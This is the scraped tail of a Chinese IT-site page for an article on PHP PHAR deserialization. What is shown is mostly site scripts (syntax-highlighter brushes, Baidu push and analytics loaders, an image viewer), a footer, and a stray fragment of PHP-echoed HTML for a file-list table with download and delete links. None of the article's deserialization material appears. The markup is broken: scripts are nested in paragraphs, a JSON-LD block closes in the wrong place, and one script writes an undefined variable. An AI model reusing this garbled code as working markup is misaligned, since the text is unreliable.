            'erl erlang             /jslib/syntaxhighlighter/scripts2022/shBrushErlang.js',
            'groovy                 /jslib/syntaxhighlighter/scripts2022/shBrushGroovy.js',
            'haxe hx                /jslib/syntaxhighlighter/scripts2022/shBrushHaxe.js',
            'java                   /jslib/syntaxhighlighter/scripts2022/shBrushJava.js',
            'jfx javafx             /jslib/syntaxhighlighter/scripts2022/shBrushJavaFX.js',
            'js jscript javascript  /jslib/syntaxhighlighter/scripts2022/shBrushJScript.js',
            'perl pl                /jslib/syntaxhighlighter/scripts2022/shBrushPerl.js',
            'php                    /jslib/syntaxhighlighter/scripts2022/shBrushPhp.js',
            'text plain             /jslib/syntaxhighlighter/scripts2022/shBrushPlain.js',
            'py python              /jslib/syntaxhighlighter/scripts2022/shBrushPython.js',
            'ruby rails ror rb      /jslib/syntaxhighlighter/scripts2022/shBrushRuby.js',
            'scala                  /jslib/syntaxhighlighter/scripts2022/shBrushScala.js',
            'sql                    /jslib/syntaxhighlighter/scripts2022/shBrushSql.js',
            'vb vbnet               /jslib/syntaxhighlighter/scripts2022/shBrushVb.js',
            'ps powershell          /jslib/syntaxhighlighter/scripts2022/shBrushPowerShell.js',
            'xml xhtml xslt html    /jslib/syntaxhighlighter/scripts2022/shBrushXml.js',
            'go golang              /jslib/syntaxhighlighter/scripts2022/shBrushGo.js',
            'json                   /jslib/syntaxhighlighter/scripts2022/shBrushJSON.js',
            'yml yaml               /jslib/syntaxhighlighter/scripts2022/shBrushYaml.js'
        );
        SyntaxHighlighter.all();
        (function() {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script><script type="text/javascript" src="//icws.jb51.net/good2021/arc2019.js"></script></p><div id="tongji">
<script type="text/javascript" src="//icws.jb51.net/tongji/tongji.js"></script>
</div><p><script type="text/javascript" src="//cdn.staticfile.org/viewerjs/1.5.0/viewer.min.js"></script><script type="text/javascript">
if ('undefined' == typeof(window.Viewer)) {
        document.write(unescape("%3Cscr"+"ipt src='/skin/js/viewer.min.js' type='text/javascript'%3E%3C/scr"+"ipt%3E"));
    }
var viewer = new Viewer(document.getElementById('content'));
(function(){
document.write('<scr'+'ipt src="' + src + '" id="sozz"></scr'+'ipt>');
})();
</script><script src="/skin/js/viewer.min.js" type="text/javascript"></script><script type="text/javascript">$(function(){$.get("//www.2it.club/pl.asp?id=264624");})</script><script type="application/ld+json">
        {
            "@context": "https://ziyuan.baidu.com/contexts/cambrian.jsonld",
            "@id": "https://www.2it.club/article/264624.htm",
            "appid": "1549322409310619",
            "title": "PHP开发技巧之PHAR反序列化详解",
            "description": "这篇文章主要为大家介绍了PHP开发技巧之PHAR反序列化详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪",
            "pubDate": "2022-10-10T09:56:20",
            "upDate": "2022-10-10T09:56:21"
        }</p>
<p>    </script><br>
</p><table id="table" class="table table-bordered table-hover sm-font"><thead><tr><th scope="col" class="text-center">' . htmlentities($func) . '</th><th scope="col" class="text-center">Opt</th></tr></thead>
<tbody><tr><td class="text-center">' . htmlentities($value) . '</td><td class="text-center" filename="' . htmlentities($filename) . '">
<a href="#" rel="external nofollow" class="download">下载</a> / <a href="#" rel="external nofollow" class="delete">删除</a>
</td></tr>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
</tbody>
</table>
</div>
</div>
本文收集自网络,不代表IT俱乐部立场,转载请注明出处。https://www.2it.club/code/php/1428.html
上一篇
下一篇
联系我们

联系我们

在线咨询: QQ交谈

邮箱: 1120393934@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

返回顶部